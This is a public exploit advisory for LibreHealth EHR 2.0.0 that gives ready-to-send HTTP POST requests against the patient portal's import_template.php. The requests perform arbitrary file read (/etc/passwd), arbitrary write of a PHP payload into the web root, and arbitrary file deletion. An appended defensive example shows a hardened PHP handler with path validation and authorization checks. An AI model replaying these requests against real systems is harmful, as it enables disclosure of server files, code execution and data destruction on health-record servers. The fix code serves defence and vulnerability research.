# Exploit Title: LibreHealth 2.0.0 - Arbitrary File Actions
# Date: 2018-10-19
# Exploit Author: Carlos Avila
# Vendor Homepage: https://librehealth.io/
# Software Link: https://github.com/LibreHealthIO/lh-ehr
# Version: < 2.0.0
# Tested on: Debian LAMP, LibreHealth 2.0.0

# LibreHealth is the 'fork' of the OpenEMR project. I have executed these PoCs
# based on the bug reported by Joshua Fam [@Insecurity]

# 1. Arbitrary File Read:
# In LibreHealth a user that has access to the patient portal (authenticated) can send a
# malicious POST request to read arbitrary files.

POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded

mode=get&docid=/etc/passwd

# This attack represents a file inclusion attack (LFI)

# 2. Arbitrary File Write:
# In LibreHealth a user that has access to the patient portal (authenticated) can send
# a malicious POST request to write arbitrary files.

POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded

mode=save&docid=payload.php&content=<?php phpinfo();?>

# After sending the request you can browse to the location where the file was written;
# payload.php is served at http://192.168.6.200/patients/payload.php

# 3. Arbitrary File Delete:
# In LibreHealth a user that has access to the patient portal (authenticated) can send a
# malicious POST request to delete an arbitrary file.

POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded

mode=delete&docid=payload.php

# After sending the request, navigating to the deleted page should return a 404 error (page not found)
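As an added, defender-side example that is not part of this advisory or of LibreHealth's own code: a hardened PHP handler for a mode/docid endpoint like the one above, where docid is restricted to a bare file name with an allowed extension and re-checked with realpath() so it can never leave one fixed template directory. The directory path, the allowed extensions and the current_user_may_manage_templates() authorization helper are assumptions.

```php
<?php
// Added example, not LibreHealth's code. docid may only name a plain file
// inside one fixed directory, so "/etc/passwd", "../x" and "payload.php" are
// all rejected before any I/O. TEMPLATE_DIR is assumed, outside the web root.
const TEMPLATE_DIR = '/var/lib/app/templates';

// Absolute path for $docid inside TEMPLATE_DIR, or null when the name is not a
// bare file name with an allowed extension or realpath() leaves the directory.
function resolve_template_path(string $docid, bool $mustExist): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.(txt|html)\z/', $docid)) {
        return null;                 // traversal, NUL bytes, .php, ...
    }
    $base = realpath(TEMPLATE_DIR);
    if ($base === false) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $docid;
    if (!$mustExist) {
        return $candidate;           // new file; the name is already validated
    }
    $real   = realpath($candidate);  // follows symlinks
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                 // missing, or a symlink escaping $base
    }
    return $real;
}

// Being logged in to the portal is not enough: the caller must also be
// authorized to manage templates (assumed helper; use the application's own).
if (!current_user_may_manage_templates()) {
    http_response_code(403);
    exit;
}
$mode  = $_POST['mode']  ?? '';
$docid = $_POST['docid'] ?? '';
$path  = resolve_template_path($docid, $mode !== 'save');
if ($path === null || !in_array($mode, ['get', 'save', 'delete'], true)) {
    http_response_code(400);
    exit;
}
if ($mode === 'get') {
    header('Content-Type: text/plain; charset=utf-8');
    readfile($path);
} elseif ($mode === 'save') {
    file_put_contents($path, (string)($_POST['content'] ?? ''));
} else {
    unlink($path);
}
```

Because the directory sits outside the web root and only .txt/.html names are accepted, a written file can never be executed or fetched as a script by the web server, which is what the write PoC above relies on.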